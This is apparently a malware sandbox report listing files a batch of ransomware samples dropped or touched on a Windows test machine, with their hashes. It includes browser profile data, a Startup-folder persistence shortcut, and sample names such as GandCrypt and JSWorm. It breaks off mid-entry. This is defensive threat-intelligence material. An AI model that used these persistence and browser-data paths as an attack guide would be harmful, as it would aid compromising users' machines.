                                                                                                                                                                                                                                                                                                                                                                                                54cb446f628b2ea4a5bce5769910512e

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\c6b46268-c48c-4a48-95ec-40ad8f07446b.tmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                160KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                54497ce2271deb0e673ec048b44da343

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                5f886314234b7aa6a4da5efc937a9d63ed007727

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                3dcf052bb8050fa32f28873bb665f63f457799cb9a92549fb2dbea94014f929b

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                d0d77d763b1b12c1b9d7a9a3f2aee4640ed5fb10d828b7c3c2cb051504c2b7b6438309124b934b346a4152c0aca009883d6bda42dc997188b8ca2736ac3419c9

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                0425b4e169bcf9995dcf5b8cd0f48625

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                ad30d6e8dbf629f30f668d0151d431a6f73ff743

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                c7ffb7c95d7542cf715c6764b5a37284bcff61d3143ef070f42dddead01100c0

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                23c144a81f7ae03b7a63e3a1ef185172127ce9ee5170d9d0c38315dcc0bc732f9dfe9442c8727701abb86608a4de78c33c981467000b36e768e320b04fdba939

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                f72fcccccf6196dcb54106104e9f50eb

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                b6cb50d31da4c9eb8aca39a2eeb26e302ddd2f3c

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                cfdd5ca141179cad96b9d2abddab28494e43a5afcc20fa0be9886f229987d9d5

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                22cc8d772b65163e7752e6b7f220a589ba4eb024f288c1f601b5e3fd277b43cc826cda9244000ee9e694f51547a3d1a3a52fdc3ffdf7ec8c48724a97d294cab1

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json~RFe5a99e0.TMP

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                24KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                1cfa1e54d59539322b9e6373802b4aa7

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                47c5ff2adbaceb5122a0e26043884f5d9f234523

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                e4bec9de10b7d08eb3ced25c78af1e00b1deb1325d9e65781228e78fd7315661

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                c9de7374da4e737f88890d84c861bf221f66cf771b926cc2c7fe807e6c43b893eda388129b1fc2b9f74c61f90b310ae1094cb093cd1db44f4a22372ad85f1fe5

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\GrShaderCache\data_0

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                cf89d16bb9107c631daabf0c0ee58efb

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\GrShaderCache\data_1

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                264KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                d0d388f3865d0523e451d6ba0be34cc4

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                8571c6a52aacc2747c048e3419e5657b74612995

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\GrShaderCache\data_2

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                0962291d6d367570bee5454721c17e11

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                59d10a893ef321a706a9255176761366115bedcb

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\GrShaderCache\data_3

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                41876349cb12d6db992f1309f22df3f0

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                5cf26b3420fc0302cd0a71e8d029739b8765be27

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Local State

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                b88a8dfc024b367a8505fcf1928f33f8

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                ea2c127ed12e9e270d55c03b69605b422a52af25

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                75ec9258a168e057645bce30ad21d37473332c616e7ff090f1bba84052f3cb23

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                9bd2fdcca7d00e7e45766bfb90f6308d3eadb91bdd76fdd1433859ead5828fe7bab18b37a6c97438a0a8250c9765901bd7ea4067613bbd17359b5c474971e9ce

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Local State

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                4d8fa610ec9bcd4cf11db92f571e15ce

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                55ae071896c540024c0903c3079b8f656ea53d26

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                60fa239eade5c781a92ff56455b5fb0321949c0d8218c518781ebf0986309b35

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                47d5c1e3db4b125da29a0b7145ffedf24e7f83f647ca0668e7d895913ea693e69d4022aab67d0b7951206ab82a2d6b95bf0554d6921a330daf9672975427d6f2

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Local State

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                9KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                80d3f7544ba4b8f6384e743a7eb1f47b

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                40de9926eb86e29f854bedd2a87c2e46b3870273

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                4a4dda4056b9ddefa4f97fd7f6f71b6ad1f7de3db4e421c7d13be0369cd7a2f9

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                c6550064c15aa6513e339016c68b058e5779e116a672b11b145dfa172e9426a1617cd0d85b5203311338ef280cb80b40ccaf0c32ec4543cabbe4c8434ab8aa1e

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Local State

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                9KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                f16841f44091fb6a93386503f82a3653

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                5230eeec8fbaa6ddda10b523145f1c89cda9e849

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                33b9a0b0a6d756213bde00ab957b1f63eb14ee5eee021de46aaaa6d931f6f330

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                0088e05e7df5f0d31b31aca9554c1139263e6234dbd8acf82116aba90574653cee279dd7e032aa1fcdfa7554b1c9c96593c03f8fe20a93324efa79349ef67f6a

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Local State~RFe5a922f.TMP

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                eddd95bb8c45ad9d3d7fe767ca61a1de

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                9a6c2f0653afff7aca6cad9ad69df8f1c1139268

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                b81e02fc05d4d79eef83056f6e14f59b4ec233233118f3f5d68dd74eb426e69b

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                66f7404b6676c6537394264715d509834ad5b86eac31f98f0bb1ad310d10bba7ccb0d55afcd83eb581eed827426b11f42c575ca17bf8bf333014d43e6602f7bd

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                27d7961b2de270786f9362df66aca71d

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                200e3ce3e8dda8673eaf773c26bb7424cdf576d6

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                ce5b9ffa85139b9e111c60768a520b1e8e7c3853b3ec3d8b0fd990a0d572a641

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                cde00c3ce46188657fc525c201b9a2df98995d6753284cd439557d90972cf0089c094123c6ae3d555e08c9cbecaa41d15f1851f87ea26eb19eb4a955a82f0639

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\places.sqlite

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                68KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                5ba3d336b34728c1891fa65c69c37a00

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                0294c55563fcd1583d9d9ccdc85e15f6e8b133bc

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                9754160874c0c12513dcb3fe9b132c6452f515f84a5f49e989f7bafc3e5ae771

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                06450e084336d7f75ceb7e9836f0ee489a6186b06ef5b557b7cc5086b8f1c6aff3f68ff4bd23241abc6135ff2cd946612809556ae7e341234ace35ac8a1b5f6e

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                40db845b744e26571f4f407df01b731e

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                7b80c5a02a12fdc21b002940a8e3b05f92c3ef42

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                63855bf56c0920b103688812b20c1523af6fe1a41c42ae7d3906c8b0360ebcfd

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                df43b079fc665eaeff681d29f5f62e82a8388b4bbe3df5735713006bad01bce05e622780012970f0c53262a1504f876cd7f7196f3a49a24d43c1c36fe45f4294

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks-20241105215429.315563.backup

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                3adec702d4472e3252ca8b58af62247c

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                35d1d2f90b80dca80ad398f411c93fe8aef07435

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                2b167248e8136c4d45c2c46e2bff6fb5e5137dd4dfdccde998599be2df2e9335

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                7562e093d16ee6305c1bb143a3f5d60dafe8b5de74952709abc68a0c353b65416bf78b1fa1a6720331615898848c1464a7758c5dfe78f8098f77fbfa924784c0

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\BookmarksExtras

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                18KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                9e98e3e6a19026b98f03ee02260a4169

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                43aa6fd8deb85bb5ca3ce7de64f9acd8eca526d5

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                29fd582f53939904bb34eaf956f50848f790f5f2774bccab9d357b33afe9f5ae

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                40fbc9289cd578e1d02a1c78fdda3a32f288806b597ff2c52424765a8b5bc9469afbcb68d44f210acbdef19022300ffc1ed456e93153686db5b662735a6593a3

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                318B

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                e008c3412c4d4b93ac92078866c069eb

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                ecc09219949f386152bb292c18cd4ee97bbbf2a7

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                d59d2f5ac6739824d9cb312df98ba6879b2d469ba69f417010d6ed9acf4bbe74

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                149fe0a322e5bc36d613a7ccc2ce31f9d6888ee8d7f84c31ee75d3aa1a8b96e5b6215fc5abfd066009cfddb22681affa15ce80ce005d14df56c03b87c9b6e8f9

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.MSIL.Blocker.gen-7255ad5bcb24214dab33d7dbbbff317a0fc3cb3ecaffd59e313c72bdbf5b0afc.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                584KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                c152e07c298d1a007ce410a488d0563a

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                d143b50744d0411124336e42b9b2071ab91f5714

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                7255ad5bcb24214dab33d7dbbbff317a0fc3cb3ecaffd59e313c72bdbf5b0afc

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                da12e177118ae3b9892e6957736cee8e59f990820e650fecee8532020e856d7d7d52bd7d28a95bb9659ae39ad46b7c7ec042111663c2ec25672a5d8089f8bcba

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-9f44d74b5fe2e6353074ba70ade88d1747f038ca9902be34cb2ca95eecafc760.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                621KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                1157923e5cd51d747faf266da4e22de5

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                fc2cd39cfae0b4f5ea343e6286e3e98147fac320

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                9f44d74b5fe2e6353074ba70ade88d1747f038ca9902be34cb2ca95eecafc760

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                668e34d0dd732915573e99cae4fb5b7de590f89824fc1142ae3b5fd737af0489be5f69ca9121f8e80f2cb380795ca95addb582ef22a214942f0cc74e1f892a1f

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.MSIL.Gen.gen-61a9ddcb15f0845bd89f2c4ca454e7d8f0a0b7a478ec2d980ae4fa333c1b4dd2.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                266KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                e5dce3d5e39a5e790a407c3e0632b887

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                8aa120b9b284744ea45ce5368a64b979e4a19ed4

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                61a9ddcb15f0845bd89f2c4ca454e7d8f0a0b7a478ec2d980ae4fa333c1b4dd2

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                9fb695d9b51f909a9c467f8f6dd2a0b6aa3379120b51d0a1eba308650e71f6dc330ea9ddcb9ec01e6097c1ef245bd3705f741a5b43d24237219a4be1d4150ea9

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Agent.gen-e8afae434aa9c3a3c848aa1f0809ebbddb6c88d45f39ba4306bbdefac4e59207.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                176KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                1c2bd3bcb860d67bce367a3f703f64ea

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                4541b8ab666dff77aa07831561788e6c41e7a0bb

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                e8afae434aa9c3a3c848aa1f0809ebbddb6c88d45f39ba4306bbdefac4e59207

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                e6d0be2bc4a066525a6987929829582b944890ba00625da490099d29312859e5731b6e9eda6771ecae1958cb7d3ca9477b8e506307ebb631f1fc05f9261657ad

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Blocker.gen-3378c59eba9f93c3b7dcb589c53f63fcf7e0baba98aadbff3b994653e9dc44df.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                444KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                3ca3a85a41d2b6494c47756b82df2101

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                7c030234916fc2ddd7d06241087636728a6aebd1

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                3378c59eba9f93c3b7dcb589c53f63fcf7e0baba98aadbff3b994653e9dc44df

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                0617e8db2e6d8aefa8a7957a3af8ce14792896b368e5f925a488e764018e52cd7cd0a6b705b6f4f4eefc635cffc1e5b8f86f6c831dda655530287877140d73c6

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Crypmodadv.gen-ee0a206415cce60f8b3afb29d8c17f86fe1923cbdf69812be139a3012b2fa24b.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                145KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                b9c32274be42fd6ad161ab31f742bc28

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                9901f7b53a1a7bf4ede32fa0bef31583553e48bf

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                ee0a206415cce60f8b3afb29d8c17f86fe1923cbdf69812be139a3012b2fa24b

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                bc7b299144acffa4ae29d173c147a3185d356f260bae6967122d8a56c56016548fcbdd560f06ca4974828ce3afd3d77ce68317aaeab167cf9332477a6e0fd312

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Encoder.gen-b5608ed0190cd8126f9f7e0005b0e3331ba431594a7ccf85f0b4c2593ed73c5c.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                201KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                7f86efd01225822fe33fea5db4f81758

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                6b8d849a377db07537d43c6111be60fb3749213b

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                b5608ed0190cd8126f9f7e0005b0e3331ba431594a7ccf85f0b4c2593ed73c5c

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                e9bb1aa3544f6bef047e488174dc8d669e3749dc7dfc8a34fa37c0cb0643af54c404195f2b6f62d7b7545a00ea3e0049e8454fb80cce316cff23a26bbde8007f

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Generic-78d775670595e06249a026efd6d31c314707c1cdb80ef3650bffa2f7e0c57784.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                134KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                a36bcd1279034cc8126b508a214e2b07

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                f6396b5dd514ca89a0ee7bbdc4eb1d2392e9b648

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                78d775670595e06249a026efd6d31c314707c1cdb80ef3650bffa2f7e0c57784

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                5c2d8953e5fc019e426a6bc1e925478f66414005c20c1b6d651123b0e7603d82a2fff41ab18a8965fa302563483bf717090efd55590887c01640f21863ffd9be

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.JSWorm.gen-cedf567ebc23b6090de2703911003e3bdbf2c13cc61b700240536715935e835c.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                d5d3290fb2484848dbbf37e1b26942da

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

